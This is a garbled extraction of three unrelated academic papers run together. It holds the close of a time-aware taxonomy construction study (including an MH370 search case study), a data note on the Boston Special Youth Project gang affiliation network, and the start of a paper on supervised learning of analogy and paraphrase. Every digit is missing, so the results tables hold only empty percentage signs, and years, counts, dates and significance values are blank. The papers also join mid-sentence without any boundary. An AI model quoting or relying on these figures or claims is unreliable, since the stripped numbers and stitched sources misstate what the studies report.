; f-measure = × precision×recall precision + recall . . . experimental results the experimental results are given in table which shows that our time-aware method achieves significantly better performance than kozareva’s method and zhu’s method in terms of f-measure (t-test, p-value< . ). our method shows slightly lower precision than that of kozareva’s method due to the scs method, but much higher recall and f- measure than kozareva’s method. in contrast, our method shows slightly lower recall but much higher precision and f-measure than zhu’s method, which is based on statistical methods such as pointwise mutual information and cosine similarity. on aver- age, our time-aware method improves the f-measure by % compared to kozareva’s method, and by % compared to zhu’s method. moreover, the incorporation of timestamps into the time-aware method also contributes to better per- formance as it helps identify new taxonomic rela- tions effectively, while getting rid of obsolete and incorrect relations. as shown from the experimental results, the time-aware method shows significantly better performance than the non time-aware method (i.e. tuan’s method) in all four domains in terms of method domain p r f kozareva mh % % % zhu mh % % % tuan mh % % % time-awaredocstamp mh % % % time-aware mh % % % kozareva ai % % % zhu ai % % % tuan ai % % % time-awaredocstamp ai % % % time-aware ai % % % kozareva terrorism % % % zhu terrorism % % % tuan terrorism % % % time-awaredocstamp terrorism % % % time-aware terrorism % % % kozareva disease % % % zhu disease % % % tuan disease % % % time-awaredocstamp disease % % % time-aware disease % % % table : experimental results for taxonomy construction. p stands for precision, r for recall, and f for f-measure. f-measure (t-test, p-value< . ). on average, our time-aware method improves the f-measure by % compared to tuan’s method. we further examine the taxonomic relations iden- tified by the time-aware method but not by the non- time-aware method, and vice versa. we observed that around % of relations found by the time- aware method but not by the non-time-aware method are recent relations (i.e., relations found in recent documents), while around % of relations found by the non-time-aware method but not by the time- aware method are obsolete relations. the percentage of taxonomic relations that become obsolete in each of the datasets are summarized in table . domain percentage of obsolete relations mh % ai % terrorism % disease % table : percentage of taxonomic relations that become obsolete. for example, in the terrorism domain, our method recognizes ‘isis’ as a hyponym of ‘terrorist group’, while the three state-of-the-art methods can- not recognize this. in addition, while the other three methods have extracted the outdated taxonomic re- lation between ‘palestine liberation organization’ and ‘terrorist group’, our method was able to ig- nore it. the reason is that the three state-of-the- art methods inferred taxonomic relations using co- occurrence frequency, but ‘isis’ has only appeared in reports since . the occurrence frequency of ‘isis’ was very low compared to ‘palestine liber- ation organization’ which was mentioned over the past many years. in contrast, by using the timestamp contribution function to better profile the relevance of evidence over time, our method can recognize the recent relationship of ‘terrorist group’ with ‘isis’ while getting rid of the obsolete and incorrect rela- tion with ‘palestine liberation organization’. from the experimental results of the time-aware and time-awaredocstamp methods, we also observe that the use of timestamps extracted at the sentence level is more effective than the use of timestamps at the document level. the timestamps extracted at the sentence level can capture more precisely the tempo- ral information of the facts in fast-changing domains than those at the document level. the results showed that the use of sentence-level timestamps can im- prove the precision and recall of our taxonomy con- struction method, improving the f-measure by % on average, as compared to the use of timestamps at the document level. . evaluation on taxonomy update . . experiment for fast-changing domains, taxonomies should be frequently and quickly updated. in this experiment, we examine how the proposed time-aware method can effectively update the constructed taxonomies over time to keep up with the latest information trends. we use the case study of the ‘mh ’ domain for this experiment. during the search operation for the missing flight mh , there were several turning points which can be captured by the follow- ing phases (according to well-known news agencies such as cnn, bbc and the new york times): • phase (from march , ): the flight lost contact with the airport. the search started from the south china sea and gulf of thailand, and was extended to the strait of malacca. • phase (from march , ): images from satellites indicated the plane might have fallen into the indian ocean. the search focus was moved from the south of sumatra to the south- west of perth in the southern indian ocean. • phase (from march , ): estimation of the aircraft’s remaining fuel and the radar track led the search to shift to a new area, the north- west of perth in the southern indian ocean. we apply the proposed time-aware method to con- struct and update the taxonomy for ‘mh ’ incre- mentally every two days. we compare our time- aware method with the following three methods: • zhu’s method (zhu et al., ): it applies a graph-based algorithm to update taxonomies incrementally with timestamp information. • baseline : the taxonomy is updated with the newly obtained data every two days, but does not use any temporal information in either tax- onomic relation identification (section . . ) or taxonomy induction (section . . ). specifi- cally, step (update existing taxonomy) in sec- tion . . is excluded since we are not using any temporal information, so there is no updat- ing of the weights of the existing taxonomy us- ing the decay function. • baseline : we construct the taxonomies using temporal information every two days, but only with the new documents from these two days. this allows us to evaluate the effect of retiring all the taxonomic relations built from the pre- vious documents instead of the gradual decay approach in our proposed method. here we have chosen the time period of two days because the ‘mh ’ domain was a truly fast- changing domain. as we shall see shortly, even us- ing only the new documents within days to build the taxonomy in our baseline method , there were new taxonomic relations updated from the latest in- formation (as shown in the example in figure ). . . evaluation metric when constructing the gold standard taxonomies using the same rules described in section . , we asked the annotators to select for each parent term at most three sub-terms that are most related to it at the time of taxonomy construction. we denote the set of gold-standard taxonomic relations as sgold. in the same way, when applying the methods of tax- onomy construction, we select for each parent term at most three sub-terms with the highest evidence scores. we denote the set of those automatically ex- tracted taxonomic relations as s. we use the follow- ing metrics to evaluate the update of taxonomy: precision = |s ∩sgold| |s| ; recall = |s ∩sgold| |sgold| ; f-measure = × precision×recall precision + recall . the intuition for limiting the sub-term number to three for the evaluation is that if a taxonomy can keep up with the newly updated data, it should be able to detect the emerging terms and relations and add them to the taxonomy with high evidence scores so that the user can easily observe an emerging trend of information in the domain as it occurs. in addi- tion, the method should also have the capability to remove any obsolete relations in the taxonomy when they are no longer valid. . . experimental results from the results shown in figure , we can see that our time-aware method achieves the best performance and significantly outperforms the two baseline methods and zhu’s method in terms of f-measure (t-test, p-value< . ). one interest- ing point to observe is that there are two periods when the time-aware method shows much higher f-measure than the baseline methods and zhu’s method: from march to march , and from march to march . during these periods, the performance of baseline method (which does not use any timestamp information) and zhu’s method drops significantly, while our time-aware method’s performance increases slightly. one plausible explanation is that there are some turning points on march and march , which fall within these periods as described above. dur- ing these periods, many new terms/relations such as search area, search focus and search device are added to the corpus. our time-aware method was able to assign higher weights to the new taxonomic relations than the older relations due to their recent timestamps, even though the frequencies of these new relations are fewer than that of the older re- lations. in contrast, zhu’s method and baseline method were unable to recognize these new rela- tions due to their relatively low frequencies in the corpus. in addition, incorrect relations in the exist- ing taxonomy were also removed from the new tax- . $ . $ . $ . $ . $ . $ . $ . $ . $ *m ar $ *m ar $ *m ar $ *m ar $ *m ar $ *m ar $ *m ar $ *m ar $ *m ar $ *m ar $ *m ar $ * a pr $ * a pr $ * a pr $ * a pr $ *a pr $ *a pr $ *a pr $ *a pr $ *a pr $ *a pr $ *a pr $ *a pr $ *a pr $ *a pr $ *a pr $ f" m ea su re ) figure : performance results on taxonomy update over time in the ‘mh ’ domain. onomy using the information decay function by our time-aware method, whereas the other two methods still kept them in the taxonomy. in short, our time- aware method can update the taxonomy faster with the latest information trends, as well as remove in- correct relations effectively, as compared to the other methods. also, from the experimental results of our time- aware method and the baseline method , we can observe that updating the existing taxonomy with new taxonomic relations is more effective than re- building a new taxonomy using only the new data. the reason is that although some older taxonomic relations are mentioned occasionally in the new data, they are still valid. therefore, if we ignore the older data, their taxonomic relations will be lost in the new taxonomy when it is constructed with only the new data. in addition, there are also many taxonomic re- lations that needed a longer time period to become established. figure shows an example of the changes of the hyponym list for the term ‘search area’ over time using different methods. we observe that both the time-aware method and baseline method , which utilized the temporal information, can quickly up- date the relations with the latest information as com- pared to zhu’s method and baseline method , which ignore temporal information for taxonomy construc- tion. for example, in the taxonomy constructed on march , the time-aware method and baseline method can quickly recognize the change of the search area to ‘southern indian ocean’ and ‘suma- tra’, thereby ranking them at the top of the hy- ponym list of ‘search area’, whereas zhu’s method south china sea gulf of thailand malacca strait zhu’s method baseline method time-aware method - - - - - - - - - - south china sea gulf of thailand southern indian ocean southern indian ocean south china sea sumatra south china sea gulf of thailand malacca strait south china sea southern indian ocean gulf of thailand southern indian ocean south china sea sumatra south china sea malacca strait gulf of thailand southern indian ocean sumatra south china sea southern indian ocean south-west of perth south china sea southern indian ocean south china sea south-west of perth north-west of perth southern indian ocean south-west of perth north-west of perth southern indian ocean south china sea north-west of perth southern indian ocean south china sea north-west of perth southern indian ocean - - - - actual search area: south china sea, malacca strait, gulf of thailand actual search area: sumatra, south-west of perth, southern indian ocean actual search area: north-west of perth, southern indian ocean baseline method south china sea malacca strait gulf of thailand southern indian ocean sumatra south china sea southern indian ocean south-west of perth north-west of perth southern indian ocean north-west of perth southern indian ocean southern indian ocean sumatra south-west of perth figure : top three hyponyms of ‘search area’ in ‘issues related to mh search’ taxonomies over time. and baseline method both missed this update un- til march . another interesting point is that due to the lack of temporal information, both zhu’s method and baseline method still ranked ‘south china sea’ at the top of the taxonomies constructed on april , while this term was removed earlier from the hyponym list of ‘search area’ by our time-aware method using temporal information. . parameter tuning in our method for taxonomy construction, some pa- rameters are tuned to optimize performance. the threshold value for scoretime in equation ( ) controls the number of extracted taxonomic re- lations. in general, the larger this threshold value is, the higher number of true taxonomic relations we can get. however, a higher number of incorrect re- lations may also occur. from our experiments, we found that the threshold value for scoretime can be set between . to . for the time-aware method to achieve the best performance. the control rate ξ in equation ( ) and decay rate λ in equation ( ) affect the contribution of old and new data. specifically, smaller values for the con- trol rate and decay rate will allow newer data to con- tribute more evidence of taxonomic relations than older data, whereas larger values will cause the old and new data to have similar evidence contribu- tions. according to our experiments, the time-aware method shows the best performance when the values of these rates are set between . to . . conclusion in this paper, we have proposed a novel time-aware method for taxonomy construction given a time se- ries of text documents from a domain that could be fast-changing with emerging concepts or events. by using timestamp contribution and information decay functions, our method can effectively utilize tempo- ral information for both taxonomic relation identifi- cation and taxonomy update. the experimental re- sults show that our method achieves better perfor- mance than the state-of-the-art methods. in addi- tion, the proposed method can be used to update the taxonomy incrementally over time and keep the tax- onomy up-to-date with the latest information trends for the domain. all the datasets, including the gold standards of the four domains and the outputs of our method, are publicly available at https://sites. google.com/site/tuanluu /research/tacl . acknowledgements we are grateful to action editors lillian lee and bo pang and the anonymous reviewers for their helpful suggestions, which substantially improved the present paper. https://sites.google.com/site/tuanluu /research/tacl https://sites.google.com/site/tuanluu /research/tacl references david m. blei, thomas l. griffiths, michael i. jordan, and joshua b. tenenbaum. . hierarchical topic models and the nested chinese restaurant process. advances in neural information processing systems, pages – . kurt bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a col- laboratively created graph database for structuring human knowledge. proceedings of the acm sig- mod international conference on management of data, pages – . angel x. chang and christopher d. manning. . sutime: a library for recognizing and normaliz- ing time expressions. proceedings of the conference on language resources and evaluation, pages – . jack edmonds. . optimum branchings. journal of research of the national bureau of standards b, : – . miles efron and gene golovchinsky. . estimation methods for ranking recent information. proceed- ings of the th acm sigir conference, pages – . samah fodeh, bill punch, and pang n. tan. . on ontology-driven document clustering using core se- mantic features. knowledge and information sys- tems, ( ): – . sanda m. harabagiu, steven j. maiorano, and marius a. pasca. . open-domain textual question an- swering techniques. natural language engineering, ( ): – . trevor hastie, robert tibshirani, and jerome h. fried- man. . the elements of statistical learning. springer-verlag. marti a. hearst. . automatic acquisition of hy- ponyms from large text corpora. proceedings of the th conference on computational linguistics, pages – . zornitsa kozareva and eduard hovy. . a semi-supervised method to learn and construct tax- onomies using the web. proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – . zornitsa kozareva, ellen riloff, and eduard h. hovy. . semantic class learning from the web with hyponym pattern linkage graphs. proceedings of the th annual meeting of the acl, pages – . dawn j. lawrie and w. bruce croft. . generating hierarchical summaries for web searches. proceed- ings of the th acm sigir conference, pages – . xiaoyan li and bruce w. croft. . time-based lan- guage models. proceedings of the th acm cikm conference, pages – . baichuan li, jing liu, chin-yew lin, irwin king, and michael r. lyu. . a hierarchical entity-based approach to structuralize user generated content in social media: a case of yahoo! answers. proceed- ings of the emnlp conference, pages – . cynthia matuszek, john cabral, michael j. witbrock, and john deoliveira. . an introduction to the syntax and content of cyc. proceedings of the aaai spring symposium, pages – . george a. miller. . wordnet: a lexical database for english. communications of the acm, ( ): – . roberto navigli, paola velardi, and stefano faralli. . a graph-based algorithm for inducing lexical taxonomies from scratch. proceedings of the th in- ternational joint conference on artificial intelligence, pages – . yves petinot, kathleen mckeown, and kapil thadani. . a hierarchical model of web summaries. pro- ceedings of the th annual meeting of the acl, pages – . aurora pons-porrata, rafael berlanga-llavori, and jose ruiz-shulcloper. . topic discovery based on text mining techniques. information processing & management, ( ): – . mark d. smucker and charles l. clarke. . time- based calibration of effectiveness measures. pro- ceedings of the th acm sigir conference, pages – . luu a. tuan, jung j. kim, and see k. ng. . tax- onomy construction using syntactic contextual evi- dence. proceedings of the emnlp conference, pages – . luu a. tuan, yi tay, siu c. hui, and see k. ng. . learning term embeddings for taxonomic relation identification using dynamic weighting neural net- work. proceedings of the emnlp conference, pages – . chi wang, marina danilevsky, nihit desai, yinan zhang, phuong nguyen, thrivikrama taula, and jiawei han. . a phrase mining framework for recursive construction of a topical hierarchy. proceedings of the th acm sigkdd conference, pages – . wentao wu, hongsong li, haixun wang, and kenny q. zhu. . probase: a probabilistic taxonomy for text understanding. proceedings of the acm sig- mod conference, pages – . jianxing yu, zheng-jun zha, meng wang, kai wang, and tat-seng chua. . domain-assisted product as- pect hierarchy generation: towards hierarchical or- ganization of unstructured consumer reviews. pro- ceedings of the emnlp conference, pages – . xingwei zhu, zhao y. ming, and tat-seng chua. . topic hierarchy construction for the organization of multi-source user generated contents. proceedings of the th acm sigir conference, pages – . microsoft word - volume _final insna.org | issues & | volume | the boston special youth project affiliation dataset jacob t.n. young arizona state university scott h. decker arizona state university gary sweeten arizona state university abstract the boston special youth project (syp) affiliation dataset is a large, bipartite network rep- resenting interactions among gang members from seven gangs for nearly three years. the project was conducted from june to may and represents one of the most elaborate gang intervention programs ever conducted. the syp was a “detached-worker program,” where an adult (typically a graduate student from one of the surrounding universities) was as- signed to an area (local parks, housing projects) to establish and maintain contact with and at- tempt to change the behaviors of the gangs. these workers collected detailed field notes (“contact cards”) documenting the activities of study gang members. however, the social network data collected on the contact cards were never analyzed by syp staff. after the death of the project leader, walter miller, in , the materials from the project became available to a team of researchers (faculty, graduate, and undergraduate students) in the school of criminology and criminal justice at arizona state university. these researchers electronical- ly scanned and digitized the contact cards, and began the process of creating a network from the cards. from these cards, a bipartite network was created where individuals (i.e. gang members) were connected to , events (i.e. contact cards). authors jacob t.n. young, associate professor at the school of criminology and criminal justice and associate director of the center for correctional solutions, arizona state university. scott h. decker, foundation professor and director of the center for public criminology at the school of criminology and criminal justice, arizona state university. gary sweeten, associate professor at the school of criminology and criminal justice, arizona state university. direct all correspondence to jacob young (email: jacob.young. @asu.edu, phone: - - , fax: - - ). school of criminology and criminal justice, mc , n. central ave., suite , phoenix, az - . connections affiliation dataset | volume | issues & | insna.org . overview the boston special youth project (syp) was a federally funded study of a gang in- tervention program (national institute of mental health) occurring between and . conducted in and around the neighborhoods of roxbury, ma, the study was one of the first large-scale evaluations of a detached-worker program, and the first designed to specifically address gang delinquency (miller, ; moule, ). spurred by the high-profile murder of a rabbi in (miller, ), the syp was implemented to restructure the activities of adolescent street gangs toward pro-social activities, provide social services to project families, and provide the community with the tools needed to control delinquency following the completion of the study (miller, , , ). the study is best known as the basis for miller's ( a) elaboration of the focal concerns of lower class culture. the syp was a “detached-worker program,” where an adult (typically a graduate student from one of the surround- ing universities) was assigned to an area (local parks, housing projects) to establish and maintain contact with, and attempt to change the behaviors of the gangs. for ex- ample, outreach workers provided mone- tary assistance, sports equipment, and clubhouses to the groups, and transported members to and from local sporting and social events. from june to may , five male and two female outreach workers maintained contact with nearly individuals between the ages of and , across roughly two dozen gangs. inten- sive contact with individuals in seven groups was made during this period. these “intense study” groups were con- tacted by workers an average of . times per week for an average duration of . hours and the intervals of the contact peri- ods ranged from to months (miller, ). during these contact periods, work- ers collected detailed field notes (“contact cards”) documenting the activities of study gang members and their interactions with each other, various community members (e.g., shop keepers, law enforcement), and the worker. contact cards also documented hearsay or evidence of conflicts within gangs, or between gangs. there were a to- tal of over , contact cards, providing a rich and unique biography of each gang. walter miller passed away in , with many of his professional papers and effects collected by a former graduate stu- dent, hedy bookin-weiner. dr. bookin- weiner contacted well-known gang re- searchers in the us about taking posses- sion of these effects. scott decker eventu- ally received the collection in . in , the typed chapters of miller's ( ) previously unpublished book, city gangs, and the roster of gang members from the syp were discovered (moule and decker, ). these data sources were eventually combined with the information from the contact cards. these rosters and the contact cards serve as the source of social network data. from to , a team of re- searchers (faculty, graduate, and under- graduate students) in the school of crimi- nology and criminal justice at arizona state university electronically scanned and digitized the contact cards, and began the process of creating a network from the cards as part of a federally funded grant (national science foundation award # ; see moule and decker, ). each card was examined to match named persons with names of known gang mem- bers from the roster of study participants. from these cards, a bipartite network was created where individuals (i.e. gang mem- bers) were connected to events (i.e. contact cards). . data collection of all the cards, there were , physi- cal contact cards. the research team was only able to clean , of the cards dur- ing the project period. during cleaning, the team noticed that many cards were dupli- affiliation dataset connections insna.org | issues & | volume | cates of events and represented retyped cards by the social workers. after remov- ing these duplicate cards and cards that were unreadable, there were , cards. of these, , had valid dates that could be used to chronologically order the cards. from there, , cards had valid entries of names. that is, names of individuals from available rosters. these , cards contain unique individuals from the seven gangs that constitute the “intensive study” groups. as shown in table , the seven gangs studied vary in age, race, gender, and size. several features of the gangs are important to note. first, there is considera- ble variation in the extent to which the full roster of gang members appear in the con- tact cards. this is because some members were involved in the crimi- nal justice system, while others would spend varying amounts of time with the group due to employment, dating, or schooling. for most of the gangs, the indi- viduals in the roster appear at least once. for the hf (black, female) gang, there is very little representation of the roster and this largely reflects the lack of cards avail- able for this gang. the last column of ta- ble shows the percentage of the cards represented by each gang. as can be seen, there is also variation in the extent to which each gang constitutes the network. by far, the mm , wm , and wm (all white and male) are the most represented gangs in the network. in fact, these three gangs account for . % of the cards in data, whereas the other four gangs (i.e. mm , hm , hf, and cf) account for the remaining . %. gang code gender race number on roster percentage of roster names (number) observed in cards observation period percentage of cards (number) represented by each gang mm male white % ( ) / / - / / . % ( , ) mm male white % ( ) / / - / / . % ( , ) wm male white % ( ) / / - / / . % ( , ) wm male white % ( ) / / - / / . % ( , ) hm male black % ( ) / / - / / . % ( ) hf female black % ( ) / / - / / . % ( ) cf female white % ( ) / / - / / . % a ( , ) table : characteristics of the seven gangs and percentage of contact cards represented by each gang acolumn does not sum to % because there are , cards where multiple gangs appear on the card. these cards get double counted in the raw frequencies shown for each gang. response rate n/a non-respondent bias n/a theoretical groupings the gangs/corner-groups are defined by geographic areas. publications using these data none. data context a data component of a gang intervention conducted in boston, ma. respondents gang/corner-group members. longitudinal yes. data were collected for variable intervals on each of the gangs. temporality low. nothing about the data, collection, or cntext suggests the validity of the data will attenuate over time. analytical or pedagocical utility can be used to validate community detection approaches since the groups are known. demonstrate properties of large, bipartite networks. examining longitudinal, bipartite networks. demonstrating consequences of projection to one-mode networks. known issues variation in the extent to which data were collected for each of the gangs. the bulk of the network is constituted by three gangs. connections affiliation dataset | volume | issues & | insna.org . data files and formats the data are provided in one excel work- book, called bipar- tite.gangs.data.xlsx, containing three worksheets (tabs). edgelist.bipartite.gangs. this is the edgelist for the undirected, unweighted bipartite network of ties from individuals to events. there are , edges and , vertices ( gang members and , cards). the first column of the sheet is the individual gang member and the second column is the event (i.e. contact card). as the edges are undirected, each row represents an individual’s presence at an event as recorded by the social worker. the vertex ids for the first mode (individ- uals) begin at and end at . the vertex ids for the second mode (events) begin at and end at , . event.date. this sheet provides the id (first column) and the month and year (second column) for each of the , events. rows – are the individual gang members with the value “na” for this attribute. the applicable values are a four-digit number indicating in the first two digits the year and the second two dig- its the month in which the card was rec- orded. for example, indicates that the card was recorded in month (i.e. june) of year (i.e. ). actor.attr. this sheet provides the id (first column), the gang in which the individuals is a member (second column), a dummy variable indicating whether the individual is male or female (third column; = male, = female), and a dummy varia- ble indicating whether the individual is white or non-white (fourth column; = white, = non-white). these attributes are provided for each of the individuals. values of “na” are listed for events. references miller, w. b. ( ). the impact of a community group work program on delinquent corner groups. social service review, , - . miller, w. b. ( a). lower class culture as a gener- ating milieu of gang delinquency. journal of so- cial issues, , - . miller, w. b. ( ). preventative work with street- corner groups: boston delinquency project. annals of the american academy of political science, , – . miller, w. b. ( ). the impact of a ‘total- community’ delinquency control project. social problems, , – . miller, w. b. ( ). city gangs. retrieved from https://ccj.asu.edu/gangresearch. moule, jr., r. k. ( ). the legacy of walter b. mil- ler. in s. h. decker and d. c. pyrooz (eds.). the handbook of gangs (pp. - ). new york, ny: wiley-blackwell. moule jr., r. k., and decker, s. h. ( ). “hidden in plain sight”: locating the men and women of the boston special youth program. journal of qualitative criminal justice and criminology , - . distributional semantics beyond words: supervised learning of analogy and paraphrase peter d. turney national research council canada information and communications technologies ottawa, ontario, canada, k a r peter.turney@nrc-cnrc.gc.ca abstract there have been several efforts to extend distributional semantics beyond individual words, to measure the similarity of word pairs, phrases, and sentences (briefly, tuples; ordered sets of words, contiguous or noncontiguous). one way to extend beyond words is to com- pare two tuples using a function that com- bines pairwise similarities between the com- ponent words in the tuples. a strength of this approach is that it works with both rela- tional similarity (analogy) and compositional similarity (paraphrase). however, past work required hand-coding the combination func- tion for different tasks. the main contribution of this paper is that combination functions are generated by supervised learning. we achieve state-of-the-art results in measuring relational similarity between word pairs (sat analo- gies and semeval task ) and measur- ing compositional similarity between noun- modifier phrases and unigrams (multiple- choice paraphrase questions). introduction harris ( ) and firth ( ) hypothesized that words that appear in similar contexts tend to have similar meanings. this hypothesis is the founda- tion for distributional semantics, in which words are represented by context vectors. the similarity of two words is calculated by comparing the two cor- responding context vectors (lund et al., ; lan- dauer and dumais, ; turney and pantel, ). distributional semantics is highly effective for measuring the semantic similarity between individ- ual words. on a set of eighty multiple-choice syn- onym questions from the test of english as a for- eign language (toefl), a distributional approach recently achieved % accuracy (bullinaria and levy, ). however, it has been difficult to extend distributional semantics beyond individual words, to word pairs, phrases, and sentences. moving beyond individual words, there are vari- ous types of semantic similarity to consider. here we focus on paraphrase and analogy. paraphrase is similarity in the meaning of two pieces of text (androutsopoulos and malakasiotis, ). anal- ogy is similarity in the semantic relations of two sets of words (turney, a). it is common to study paraphrase at the sentence level (androutsopoulos and malakasiotis, ), but we prefer to concentrate on the simplest type of paraphrase, where a bigram paraphrases a unigram. for example, dog house is a paraphrase of kennel. in our experiments, we concentrate on noun-modifier bigrams and noun unigrams. analogies map terms in one domain to terms in another domain (gentner, ). the familiar anal- ogy between the solar system and the rutherford- bohr atomic model involves several terms from the domain of the solar system and the domain of the atomic model (turney, a). the simplest type of analogy is proportional anal- ogy, which involves two pairs of words (turney, b). for example, the pair 〈cook, raw〉 is anal- ogous to the pair 〈decorate, plain〉. if we cook a thing, it is no longer raw; if we decorate a thing, it transactions of the association for computational linguistics, ( ) – . action editor: patrick pantel. submitted / ; revised / ; published / . c© association for computational linguistics. is no longer plain. the semantic relations between cook and raw are similar to the semantic relations between decorate and plain. in the following exper- iments, we focus on proportional analogies. erk ( ) distinguished four approaches to extend distributional semantics beyond words: in the first, a single vector space representation for a phrase or sentence is computed from the represen- tations of the individual words (mitchell and lap- ata, ; baroni and zamparelli, ). in the sec- ond, two phrases or sentences are compared by com- bining multiple pairwise similarity values (socher et al., ; turney, ). third, weighted inference rules integrate distributional similarity and formal logic (garrette et al., ). fourth, a single space integrates formal logic and vectors (clarke, ). taking the second approach, turney ( ) intro- duced a dual-space model, with one space for mea- suring domain similarity (similarity of topic or field) and another for function similarity (similarity of role or usage). similarities beyond individual words are calculated by functions that combine domain and function similarities of component words. the dual-space model has been applied to mea- suring compositional similarity (paraphrase recogni- tion) and relational similarity (analogy recognition). in experiments that tested for sensitivity to word order, the dual-space model performed significantly better than competing approaches (turney, ). a limitation of past work with the dual-space model is that the combination functions were hand- coded. our main contribution is to show how hand- coding can be eliminated with supervised learning. for ease of reference, we will call our approach supersim (supervised similarity). with no modifi- cation of supersim for the specific task (relational similarity or compositional similarity), we achieve better results than previous hand-coded models. compositional similarity (paraphrase) compares two contiguous phrases or sentences (n-grams), whereas relational similarity (analogy) does not require contiguity. we use tuple to refer to both con- tiguous and noncontiguous word sequences. we approach analogy as a problem of supervised tuple classification. to measure the relational sim- ilarity between two word pairs, we train supersim with quadruples that are labeled as positive and neg- ative examples of analogies. for example, the pro- portional analogy 〈cook, raw, decorate, plain〉 is labeled as a positive example. a quadruple is represented by a feature vector, composed of domain and function similarities from the dual-space model and other features based on corpus frequencies. supersim uses a support vector machine (platt, ) to learn the probability that a quadruple 〈a, b, c, d〉 consists of a word pair 〈a, b〉 and an analogous word pair 〈c, d〉. the probability can be interpreted as the degree of relational similar- ity between the two given word pairs. we also approach paraphrase as supervised tuple classification. to measure the compositional simi- larity beween an m-gram and an n-gram, we train the learning algorithm with (m + n)-tuples that are positive and negative examples of paraphrases. supersim learns to estimate the probability that a triple 〈a, b, c〉 consists of a compositional bigram ab and a synonymous unigram c. for instance, the phrase fish tank is synonymous with aquarium; that is, fish tank and aquarium have high compositional similarity. the triple 〈fish, tank, aquarium〉 is repre- sented using the same features that we used for anal- ogy. the probability of the triple can be interpreted as the degree of compositional similarity between the given bigram and unigram. we review related work in section . the gen- eral feature space for learning relations and compo- sitions is presented in section . the experiments with relational similarity are described in section , and section reports the results with compositional similarity. section discusses the implications of the results. we consider future work in section and conclude in section . related work in semeval , task was concerned with mea- suring the degree of relational similarity between two word pairs (jurgens et al., ) and task (agirre et al., ) examined the degree of seman- tic equivalence between two sentences. these two areas of research have been mostly independent, although socher et al. ( ) and turney ( ) present unified perspectives on the two tasks. we first discuss some work on relational similarity, then some work on compositional similarity, and lastly work that unifies the two types of similarity. . relational similarity lra (latent relational analysis) measures rela- tional similarity with a pair–pattern matrix (turney, b). rows in the matrix correspond to word pairs (a, b) and columns correspond to patterns that connect the pairs (“a for the b”) in a large cor- pus. this is a holistic (noncompositional) approach to distributional similarity, since the word pairs are opaque wholes; the component words have no sep- arate representations. a compositional approach to analogy has a representation for each word, and a word pair is represented by composing the represen- tations for each member of the pair. given a vocabu- lary of n words, a compositional approach requires n representations to handle all possible word pairs, but a holistic approach requires n representations. holistic approaches do not scale up (turney, ). lra required nine days to run. bollegala et al. ( ) answered the sat anal- ogy questions with a support vector machine trained on quadruples (proportional analogies), as we do here. however, their feature vectors are holistic, and hence there are scaling problems. herdağdelen and baroni ( ) used a support vector machine to learn relational similarity. their feature vectors contained a combination of holistic and compositional features. measuring relational similarity is closely con- nected to classifying word pairs according to their semantic relations (turney and littman, ). semantic relation classification was the focus of semeval task (girju et al., ) and semeval task (hendrickx et al., ). . compositional similarity to extend distributional semantics beyond words, many researchers take the first approach described by erk ( ), in which a single vector space is used for individual words, phrases, and sentences (lan- dauer and dumais, ; mitchell and lapata, ; mitchell and lapata, ). in this approach, given the words a and b with context vectors a and b, we construct a vector for the bigram ab by applying vec- tor operations to a and b. mitchell and lapata ( ) experiment with many different vector operations and find that element-wise multiplication performs well. the bigram ab is represented by c = a � b, where ci = ai · bi. however, element-wise multiplica- tion is commutative, so the bigrams ab and ba map to the same vector c. in experiments that test for order sensitivity, element-wise multiplication per- forms poorly (turney, ). we can treat the bigram ab as a unit, as if it were a single word, and construct a context vector for ab from occurrences of ab in a large corpus. this holistic approach to representing bigrams performs well when a limited set of bigrams is specified in advance (before building the word–context matrix), but it does not scale up, because there are too many possible bigrams (turney, ). although the holistic approach does not scale up, we can generate a few holistic bigram vectors and use them to train a supervised regression model (guevara, ; baroni and zamparelli, ). given a new bigram cd, not observed in the corpus, the regression model can predict a holistic vector for cd, if c and d have been observed separately. we show in section that this idea can be adapted to train supersim without manually labeled data. socher et al. ( ) take the second approach described by erk ( ), in which two sentences are compared by combining multiple pairwise similar- ity values. they construct a variable-sized similar- ity matrix x, in which the element xij is the sim- ilarity between the i-th phrase of one sentence and the j-th phrase of the other. since supervised learn- ing is simpler with fixed-sized feature vectors, the variable-sized similarity matrix is then reduced to a smaller fixed-sized matrix, to allow comparison of pairs of sentences of varying lengths. . unified perspectives on similarity socher et al. ( ) represent words and phrases with a pair, consisting of a vector and a matrix. the vector captures the meaning of the word or phrase and the matrix captures how a word or phrase mod- ifies the meaning of another word or phrase when they are combined. they apply this matrix–vector representation to both compositions and relations. turney ( ) represents words with two vectors, a vector from domain space and a vector from func- tion space. the domain vector captures the topic or field of the word and the function vector captures the functional role of the word. this dual-space model is applied to both compositions and relations. here we extend the dual-space model of tur- ney ( ) in two ways: hand-coding is replaced with supervised learning and two new sets of fea- tures augment domain and function space. moving to supervised learning instead of hand-coding makes it easier to introduce new features. in the dual-space model, parameterized similar- ity measures provided the input values for hand- crafted functions. each task required a different set of hand-crafted functions. the parameters of the similarity measures were tuned using a customized grid search algorithm. the grid search algorithm was not suitable for integration with a supervised learning algorithm. the insight behind supersim is that, given appropriate features, a supervised learn- ing algorithm can replace the grid search algorithm and the hand-crafted functions. features for tuple classification we represent a tuple with four types of features, all based on frequencies in a large corpus. the first type of feature is the logarithm of the frequency of a word. the second type is the positive point- wise mutual information (ppmi) between two words (church and hanks, ; bullinaria and levy, ). third and fourth are the similarities of two words in domain and function space (turney, ). in the following experiments, we use the ppmi matrix from turney et al. ( ) and the domain and function matrices from turney ( ). the three matrices and the word frequency data are based on the same corpus, a collection of web pages gath- ered from university web sites, containing × words. all three matrices are word–context matri- ces, in which the rows correspond to terms (words and phrases) in wordnet. the columns correspond to the contexts in which the terms appear; each matrix involves a different kind of context. the three matrices and the word frequency data are avail- able on request from the author. the matrix files range from two to five gigabytes when packaged and compressed for distri- bution. the corpus was collected by charles clarke at the univer- sity of waterloo. it is about gigabytes of plain text. see http://wordnet.princeton.edu/ for infor- mation about wordnet. let 〈x , x , . . . , xn〉 be an n-tuple of words. the number of features we use to represent this tuple increases as a function of n. the first set of features consists of log frequency values for each word xi in the n-tuple. let freq(xi) be the frequency of xi in the corpus. we define lf(xi) as log(freq(xi)+ ). if xi is not in the corpus, freq(xi) is zero, and thus lf(xi) is also zero. there are n log frequency features, one lf(xi) feature for each word in the n-tuple. the second set of features consists of positive pointwise mutual information values for each pair of words in the n-tuple. we use the raw ppmi matrix from turney et al. ( ). although they computed the singular value decomposition (svd) to project the row vectors into a lower-dimensional space, 